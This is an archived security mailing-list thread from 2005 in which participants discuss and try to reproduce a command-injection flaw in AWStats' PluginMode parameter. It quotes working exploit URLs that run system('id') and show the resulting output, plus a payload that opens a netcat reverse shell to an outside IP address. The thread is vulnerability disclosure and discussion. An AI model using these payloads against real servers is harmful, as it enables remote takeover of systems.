Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?

From: Ondra Holecek (bln_at_deprese.net)
Date: 02/15/05

  • Next message: Gwendolynn ferch Elydyr: "Re: International Domain Name [IDN] support in modern browsers allows attackers to spoof domain name URLs + SSL certs."
    Date: Tue, 15 Feb 2005 20:52:08 +0100
    To: jpratt@norwich.edu
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    It seems this bug works only on my server, i dont know why

    /awstats.pl?&PluginMode=:print+system('id')+;

    reply:

    uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256
    Error:

    Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or
    permissions) may be wrong.
    Check config file, permissions and AWStats documentation (in 'docs'
    directory).

    awstats: Advanced Web Statistics 6.1 (build 1.751) (original)
    perl: This is perl, v5.8.5 built for i586-linux
    os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown
    unknown GNU/Linux

    Ondra

    Jamie Pratt wrote:
    | So what are the conditions of this bug/vuln? I can't reproduce this on
    | several 6.3 installs..:
    |
    | awstats 6.3 from source:
    |
    | request:
    |
    |
    http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+;

    |
    |
    | output:
    | ****************
    | Error: Can't locate object method "BuildFullHTMLOutput_print" via
    | package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1)
    | line 1.
    |
    | Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or
    | permissions) may be wrong.
    | Check config file, permissions and AWStats documentation (in 'docs'
    | directory).
    | ***************
    |
    | regards,
    | jamie
    |
    | Ondra Holecek wrote:
    |
    |>
    |>
    |> GHC@www.securityfocus.com wrote:
    |> |
    |> | /*==========================================*/
    |> | // GHC -> AWStats <- ADVISORY
    |> | \\ PRODUCT: AWStats
    |> | // VERSION: <= 6.3
    |> | \\ URL: http://awstats.sourceforge.net/
    |> | // VULNERABILITY CLASS: Multiple vulnerabilities
    |> | \\ RISK: high
    |> | /*==========================================*/
    |>
    |> [...]
    |>
    |> |
    |> | PluginMode=:print+getpwent
    |> |
    |> | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
    |> | This will satisfy eval() requirements., and :print getpwent() is
    |> executed.
    |> |
    |> |
    |>
    http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent

    |>
    |> |
    |> | Sanitazing limits user's input, but there is no filtration for call
    |> sympols '()'.
    |>
    |> no, user is not limited, he can execute ANY command if he add ; at the
    |> end of the command, try this
    |>
    |> awstats.pl?&PluginMode=:print+system('id')+;
    |>
    |> or even this
    |>
    |> awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
    |>
    |>
    |> Ondra
    |
    |

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.0 (FreeBSD)

    iD8DBQFCElLofz/hUj18TqkRAvX8AJ9s8OtsQn0T29kcU6vFeaaNPcTmTgCfYv3b
    iFO82NXxa0+IlKeG0Yxd8o0=
    =FWuW
    -----END PGP SIGNATURE-----


  • Next message: Gwendolynn ferch Elydyr: "Re: International Domain Name [IDN] support in modern browsers allows attackers to spoof domain name URLs + SSL certs."

    Relevant Pages

    • RE: AWStats <= 6.4 Multiple vulnerabilities - cant reproduce in 6.3?
      ... I am unable to reproduce this. ... Check config file, permissions and AWStats documentation. ...
      (Bugtraq)
    • Re: scanning sysfs to populate /dev
      ... |> This is going to be done at early userspace time, before the root filesystem ... No config file will be available until something is mounted ... |> Later on the permissions can be updated. ... it gets included in the kernel image itself, not as a separate file like the ...
      (comp.os.linux.development.system)
    • Re: Error 403 on Apache server, You dont have permission to access / on this server.
      ... You need to check file permissions, SELinux, and HTTP configuration ... That's only a very small portion of the config file, ... And files should not be owned by apache, ... read messages from the public lists. ...
      (Fedora)
    • Re: Principal of least privilege and code access security
      ... rather than declaritive versions of the Permissions; ... > also request minimum the feature I want. ... > hardcode file paths, and there is no guarantee that Temp is a root-level ... > grant declarative access to read teh config file, as there is no way (that ...
      (microsoft.public.dotnet.security)
    • Re: Location of my xf86config file
      ... >> Tried man XFree86 as well before my first post. ... Or maybe the permissions aren't correct. ... config file that is writable other than by its owner. ...
      (alt.os.linux)